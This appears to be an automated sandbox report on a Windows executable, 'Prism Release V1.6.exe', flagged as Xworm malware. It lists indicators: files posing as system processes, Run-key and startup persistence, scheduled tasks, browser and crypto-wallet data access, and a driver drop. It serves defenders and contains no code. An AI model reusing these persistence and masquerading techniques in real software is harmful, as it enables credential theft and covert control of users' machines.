Analysis Overview
SHA256
cee9d4132e0c5f98b5d84099c9f4a080b35e436174be8e5a59df1e8c7cae8fbd
Threat Level: Known bad
The file Prism Release V1.6.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Drops startup file
Looks up external IP address via web service
Enumerates connected drives
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious behavior: AddClipboardFormatListener
Modifies system certificate store
Uses Task Scheduler COM API
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Modifies registry class
Enumerates system info in registry
Kills process with taskkill
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy service COM API
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 09:08
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 09:08
Reported
2024-06-15 09:18
Platform
win10v2004-20240611-en
Max time kernel
445s
Max time network
462s
Command Line
Signatures
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\nldrv.sys | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Prism Release V1.6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation | N/A | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\intel graphics processor.exe | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe | C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe | C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Prism.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows Runtime.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetLimiter = "\"C:\\Program Files\\Locktime Software\\NetLimiter\\nlclientapp.exe\" /minimized" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" | C:\Users\Admin\AppData\Local\dllhost.exe | N/A |
Enumerates connected drives
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Net.Sockets.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Buffers.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\Microsoft.Extensions.DependencyInjection.Abstractions.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\pt-br\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\ko\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Collections.NonGeneric.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.IO.UnmanagedMemoryStream.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Security.Cryptography.Algorithms.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Threading.ThreadPool.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\hi\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.AppContext.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.Debug.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLDiag.exe | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.IO.Pipes.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Linq.Queryable.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.CompilerServices.VisualC.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe.config | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLInterop.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLSvc.exe | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\FamFamFam.Flags.Wpf.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLSvcCliCnnCheck.exe | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Linq.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.Numerics.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Globalization.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Net.Security.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Resources.Reader.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.Serialization.Json.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Threading.Timer.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\Xceed.Wpf.Toolkit.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Console.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.TraceSource.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\Newtonsoft.Json.dll | N/A | N/A |
| File opened for modification | C:\Program Files\Locktime Software\NetLimiter\NLClientApp.exe.config | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NetLimiter.Runtime.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.IO.FileSystem.Primitives.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Reflection.Extensions.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Threading.Thread.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Security.Claims.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\es\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Drawing.Primitives.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Net.WebSockets.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Security.Cryptography.Primitives.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Security.SecureString.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\Microsoft.Win32.TaskScheduler.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLDiag.exe.config | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Data.Common.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.ValueTuple.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.InteropServices.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\ports.bin | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\NLSvc.exe.nlog | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Net.NameResolution.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.Contracts.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Threading.Tasks.Parallel.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\CoreLibNet.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\tr\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\zh-hant\NLClientApp.Core.resources.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\IPAddressRange.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Diagnostics.Process.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Runtime.Serialization.Xml.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\ScottPlot.WPF.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Numerics.Vectors.dll | N/A | N/A |
| File created | C:\Program Files\Locktime Software\NetLimiter\System.Resources.Writer.dll | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e5ce49b.msi | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIED01.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE6F0.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE720.tmp | N/A | N/A |
| File created | C:\Windows\Installer\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\nl_icon.exe | N/A | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | N/A | N/A |
| File opened for modification | C:\Windows\Installer\ | N/A | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIED00.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIECD0.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIF39A.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIA33.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIEADA.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIA54.tmp | N/A | N/A |
| File created | C:\Windows\Installer\e5ce49b.msi | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE643.tmp | N/A | N/A |
| File created | C:\Windows\Installer\SourceHash{63BC5994-B37B-4416-A29E-B2D208BD5CAE} | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIF34B.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\{63BC5994-B37B-4416-A29E-B2D208BD5CAE}\nl_icon.exe | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIA22.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE585.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIE603.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIEBB5.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIA23.tmp | N/A | N/A |
| File opened for modification | C:\Windows\Installer\MSIF716.tmp | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache | N/A | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a | N/A | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133629162826089912" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E | N/A | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe | N/A |
